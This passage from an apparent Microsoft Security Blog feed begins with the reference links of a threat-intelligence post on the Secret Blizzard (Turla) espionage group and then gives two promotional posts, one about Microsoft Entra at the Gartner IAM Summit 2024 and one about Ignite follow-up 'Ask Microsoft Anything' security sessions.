- https://blog.lumen.com/snowblind-the-invisible-hand-of-secret-blizzard/
- https://securelist.com/the-epic-turla-operation/65545/
- https://www.darkreading.com/endpoint-security/upgraded-kazuar-backdoor-offers-stealthy-power
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a
- https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet
- https://attack.mitre.org/groups/G0010/
- https://symantec-enterprise-blogs.security.com/threat-intelligence/waterbug-espionage-governments
- https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021 ver 4 – nsa.gov.pdf
- https://attack.mitre.org/software/S1074/
- https://attack.mitre.org/software/S1075/
- https://attack.mitre.org/software/S1076/
- https://cloud.google.com/blog/topics/threat-intelligence/turla-galaxy-opportunity/
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/
- https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/
- https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/
- https://www.welivesecurity.com/2018/01/09/turlas-backdoor-laced-flash-player-installer/
- https://blog.talosintelligence.com/tinyturla/
- https://www.sentinelone.com/labs/transparent-tribe-apt36-pakistan-aligned-threat-actor-expands-interest-in-indian-education-sector/
- https://www.trendmicro.com/en_dk/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html
- https://pentestlab.blog/2020/03/04/persistence-dll-hijacking/
- https://attack.mitre.org/software/S0668/
- https://blog.talosintelligence.com/tinyturla/#:~:text=Cisco%20Secure%20Malware%20Analytics%20(Threat%20Grid)
- https://www.darkreading.com/cyberattacks-data-breaches/russian-hackers-using-iranian-apt-s-infrastructure-in-widespread-attacks
- https://www.securityweek.com/russian-turla-cyberspies-leveraged-other-hackers-usb-delivered-malware/
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.
The post Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage appeared first on Microsoft Security Blog.
Explore new Microsoft Entra capabilities at Gartner Identity & Access Management Summit 2024
Identity and network access is the foundation of modern cybersecurity, with 66% of attacks involving compromised identities.¹ Equipping identity professionals to secure access to everything has never been so critical. The annual Gartner Identity & Access Management Summit, held December 9 to 11, 2024, in Grapevine, Texas, is a key identity and access management (IAM) conference that brings together identity and security experts and helps them navigate the implementation and operation of a scalable IAM infrastructure to protect their organizations.
Alongside our commitment to put security above all else through the Secure Future Initiative (SFI), Microsoft Security is committed to investing in secure identity and network access innovation. At Gartner IAM Summit, Microsoft Security will showcase the Microsoft Entra Suite—a complete Zero Trust employee access solution. Keep reading for how to connect with us in Grapevine.
AI for identity and access management
Ensuring that organizations of all sizes and industries can give the right individuals right-sized access to the right resources at the right time has been a top priority for Microsoft for years. Companies looking into IAM solutions often face challenges related to decentralized data, provisioning secure user access, and poor IAM interoperability. Microsoft Entra addresses each of these concerns directly and is designed to help organizations secure and manage digital identities across cloud-native and hybrid environments. It provides secure access for any identity, from anywhere, to any app, AI, or resource.
Last month at Microsoft Ignite we announced new capabilities—now in preview—for Microsoft Security Copilot, which is now embedded in Microsoft Entra. You can now access all identity skills previously made generally available for the Security Copilot standalone experience in April 2024, along with new identity capabilities for admins and security analysts, directly within the Microsoft Entra admin center.
Results of our recent Security Copilot IT Admin Efficiency Study are already showing promising impact:
- Copilot users showed a 46.11% reduction in completion times for sign-in troubleshooting tasks.
- Users were 46.8% more accurate across sign-in troubleshooting-related tasks when using Copilot.
- And, most notably, 95% of users agreed that Copilot helped improve the quality of their work, and 96.7% said they would want to use Copilot for these tasks in the future.
Read more on the new skills and how to implement them.
How to engage with Microsoft Security at Gartner IAM Summit
We’re excited to show off the new capabilities of Copilot in Microsoft Entra, as well as other Entra capabilities, throughout our presence at Gartner IAM Summit. Here are a few ways to join us:
- See live demos: We welcome you to visit booth #403, where you can see live demonstrations of Microsoft Security Copilot and the Microsoft Entra Suite. You’ll also hear from our experts on the best practices and product use cases.
- Join our session on AI and identity: On December 9, 2024, from 11:45 AM CT to 12:15 PM CT, Microsoft will be conducting the session Transforming the future of IAM: Bridging Identity, Network Security and AI, presented by Kaitlin Murphy, Senior Director of Product Marketing, Identity Innovations. This session explores how the current state of access management is rapidly evolving, uncovers the unification of IAM and network security, and asks whether traditional IAM solutions do enough to meet the exponential growth of identities and apps across today’s dynamic, AI-powered cyberthreat landscape. Join us to find out if identity remains the center of security.
- Join our session on improving your onboarding: The following day, December 10, 2024, from 12:45 PM CT to 1:15 PM CT, Manmeet Bawa, Director of Product Management, Identity and Network Access, will present the sponsored lunch session Strengthen your workforce security and streamline effortless onboarding with Microsoft Entra Suite. This session lets you experience how Microsoft Entra delivers seamless workforce access security from day one. You’ll be able to watch as a Microsoft expert demonstrates the process of setting up new access package policies with Microsoft Entra ID Governance and creates top-tier identity verification and entitlement management using Face Check with Microsoft Entra Verified ID.
- Book a meeting: One of the most hands-on opportunities to engage at this event is joining us for a one-on-one meeting with Microsoft Security leaders and experts. To book a meeting, click here or visit us at booth #403; the meeting can cover the important and emerging identity and network access topics you deem most important. So, whether you’re most interested in the ways Microsoft Security Copilot adds to a secure IAM landscape, have questions regarding advanced identity topics, want to learn more about the unification of identity and network security, or would like an expert’s perspective on what Microsoft Entra can do for you, we’ll be there to talk you through it.
Now that you’re interested in attending the Gartner Identity & Access Management Summit 2024, if you’ve yet to secure tickets for your team, Microsoft can now offer you a $375 discount on event registration. Simply use code IAM19EDC when registering. Once you are registered, make sure to schedule your one-on-one meeting with our experts.
For those unable to attend who are looking for another way to discover the latest innovations in the IAM space and see how technologies are evolving, the Microsoft page on identity and network access is a great place to start.
Are you a regular user of Microsoft Entra ID? Review your experience on Gartner Peer Insights™ and get a $25 gift card.
Learn more about the Microsoft Entra Suite.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
¹ State of Multicloud Risk Report, Microsoft. 2024.
Follow-up on Ignite with Ask Microsoft Anything: Microsoft Security edition
AI transformation starts with security. This was a major theme across the majority of the big news and reveals from Microsoft Security at Microsoft Ignite 2024. Security discussions also drew big crowds throughout the event, with security-related sessions scoring in the top 10 most-attended sessions on each day of the conference. In this article, we’ll share information on how you can get live answers to your questions about our latest security innovations and announcements from engineering and product teams. And if you missed it, here are just a few of the highlights from Ignite.
AI transformation requires security transformation
Before Microsoft Ignite officially began, hundreds of security and IT professionals gathered early for the Microsoft Ignite Security Forum to hear from Microsoft Security product leaders about Microsoft’s threat intelligence and AI research, among other security strategy topics. Then on Day 1 of Microsoft Ignite, the event kicked off with an exciting keynote speech that dove into how Microsoft is creating powerful new opportunities across its platforms as the era of AI takes shape—including in security. Microsoft Chairman and Chief Executive Officer (CEO) Satya Nadella kicked off the keynote’s discussion of security innovations by highlighting changes coming to Microsoft Purview.
“In the age of AI, data governance takes on an even more critical, central, important role,” said Nadella.
The keynote ended with Executive Vice President of Microsoft Security Charlie Bell, joined by Corporate Vice President, Microsoft Security Business, Vasu Jakkal. The two gave an overview of today’s security landscape and the innovations Microsoft Security is driving to help defenders rise to its challenges.
“Security is job number one in the age of AI,” said Jakkal, highlighting that one of the most critical use cases of trustworthy AI is supporting security professionals. Microsoft itself recently put generative AI in the hands of its security teams with Microsoft Security Copilot and used generative AI developed in its research labs to identify potentially exposed credentials that could have been used by cyberthreat actors. These security leaders also shared how securing and governing AI and the data it uses can help empower AI innovation and help unify and simplify security for all.
Among the most exciting news was the announcement that Microsoft Security Exposure Management is now generally available. This new innovative solution provides security professionals with a graph-based approach to proactive threat protection. It dynamically creates a comprehensive view of the entire attack surface, allowing the exploration of assets and their changing relationships with login credentials, permissions, and other ways users connect to company data. This enables more thorough assessments of your organization’s security posture and exposure.
Microsoft also shared the latest report on the Secure Future Initiative (SFI), prioritizing security above all else, establishing leading governance and frameworks to manage threats at scale, and better deterring even the most powerful and well-funded cyberthreat actors in the world. In part, this will be done through minimizing excessive permissions, reducing credential-related risks, and establishing and maintaining comprehensive asset inventories.
There was also a lot of interest around Microsoft Security Copilot. Nearly 70% of the Fortune 500 already use Microsoft 365 Copilot.¹ The Copilot stack has already begun empowering users to build even more ambitious products, and this trend is likely to continue with the announcement of Azure AI Foundry, which gives organizations the power to design, customize, and manage next-generation AI apps and agents at scale. Microsoft Security Copilot is now embedded in the Microsoft Entra admin center, delivering new identity management capabilities. The solution will also be adding new capabilities across Microsoft Intune, Microsoft Purview, Azure Logic Apps, and across the Microsoft Partner Ecosystem.
During the Microsoft Security General Session, entitled Security Innovation to Strengthen Cyber Defense in the Age of AI, speakers Joy Chik, Rob Lefferts, Michael Wallent, Herain Oberoi, and Vasu Jakkal discussed how AI can be used to enhance cyber defense mechanisms by predicting, detecting, and responding to cyberthreats more efficiently. AI-driven cyberthreat detection, for instance, is already helping to identify patterns and anomalies in network traffic. AI can also enhance automated incident responses to further minimize negative effects on organizations. The session also explored potential future trends in AI and its evolving role in cyber defense strategies.
Join us for the Microsoft Security Ask Microsoft Anything (AMA) series
Now that the news from Ignite is out, Microsoft Security is keeping all the wonderful conversations started throughout the week going with the Tech Community Live: Microsoft Security edition series of AMA sessions. These sessions will be held on Tuesday, December 3, from 7:00 AM to 11:30 AM PT, and will feature Microsoft subject matter experts—all of whom will be prepared to share in-depth content in their areas of expertise and to answer your technical questions. Each session will be streamed for viewers across LinkedIn, X, and YouTube, but if you have a burning question you want the experts to answer, make sure to add the sessions to your calendar to join the discussions live on Tech Community.
Here’s a quick summary of each AMA session, including when it will be taking place and what will be covered:
7:00 to 8:00 AM PT: Security Copilot
We’ll be jumping into Microsoft Security Copilot bright and early. Find out how to respond to cyberthreats quickly and assess risk exposure in minutes. The product team will also be sharing how to help you configure Security Copilot and process signals at machine speed, while saving time for any questions you need answers to.
Take a look at these Ignite sessions that might interest you about Security Copilot:
- Optimize with Security Copilot: Real-world insights and expert advice
- Transform your security with GenAI innovations in Security Copilot
- One goal, many roles: Microsoft Security Copilot use cases for all
- Security Partner Growth: Harness the Power of AI in Security Copilot
Next up, you can join our panel of experts ready to field questions about the Microsoft Entra Suite. Whether you want to secure access for your employees and extend Conditional Access across your cloud-native and on-premises apps or want to retire old VPNs and automate your organization’s identity lifecycle workflows, our panel will be ready to share insights, best practices, and how Microsoft identity and network access solutions can help.
Explore Ignite sessions about Entra Suite:
- Security Innovation to Strengthen Cyber Defense in the Age of AI
- Secure access for any identity to any resource with Microsoft Entra
- Secure access for your workforce with the new Microsoft Entra Suite
- Security Partner Growth: The Power of Identity with Entra Suite
By mid-morning, we’ll have a panel of experts diving into the latest Microsoft Defender for Cloud recommendations and answering your feature-specific questions.
Ignite sessions worth checking out for Defender for Cloud:
- Mitigate threats using Microsoft Defender for Cloud
- Secure Azure services and workloads with Microsoft Defender for Cloud
- Future-proofing AI-driven migrations with Microsoft Defender for Cloud
Join us to explore Microsoft’s Security Service Edge (SSE) partner ecosystem, where we collaborate with top industry leaders to deliver integrated, identity-centric solutions for enhanced security and seamless connectivity. Ask Microsoft Anything about Global Secure Access, learn how our partnerships are simplifying security and networking, and gain insights related to supporting your hybrid workforce effectively.
Check out these relevant Ignite sessions and blogs covering SSE:
- Microsoft partners for new SASE ecosystem | Microsoft Community Hub
- Microsoft and Netskope: Unified, identity-centric security | Microsoft Community Hub
- Accelerate your Zero Trust Journey: Unify Identity and Network Access
Microsoft Security Exposure Management can help experts responsible for maintaining a strong security posture at their organization gain a unified view of their cyberattack surface, investigate cyberattack paths, manage exposure, and better safeguard critical assets. Learn how to get ahead of cyberattackers in this AMA.
Must-see Ignite sessions featuring Exposure Management:
- Microsoft Ignite Keynote
- Security Innovation to Strengthen Cyber Defense in the Age of AI
- Proactive security with continuous exposure management
AI adoption is a popular and important topic this year, so join us to prepare your infrastructure to securely adopt AI, to learn the best ways to protect your AI stack and sensitive data, or if you have your own important AI security questions. Microsoft experts on this panel will help you confidently embrace the age of AI with industry-leading cybersecurity and compliance solutions.
Ignite sessions you may have missed highlighting Security for AI:
- Security Innovation to Strengthen Cyber Defense in the Age of AI
- Secure and govern custom AI built on Azure AI and Copilot Studio
- Secure and govern data in Microsoft 365 Copilot and beyond
- Scott and Mark learn responsible AI
Whether you were at Ignite or not, this live, interactive Tech Community event is one not to miss. And remember that you can also listen in as part of our cross-platform audience or watch any of the sessions at a later time, on-demand.
Sign up for Tech Community Live: Microsoft Security edition
And if you’re curious to learn more about the security news and solutions we shared at Ignite, check out the security session recordings.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
¹Ignite 2024: Why nearly 70% of the Fortune 500 now use Microsoft 365 Copilot, Nov 19, 2024
The post Follow-up on Ignite with Ask Microsoft Anything: Microsoft Security edition appeared first on Microsoft Security Blog.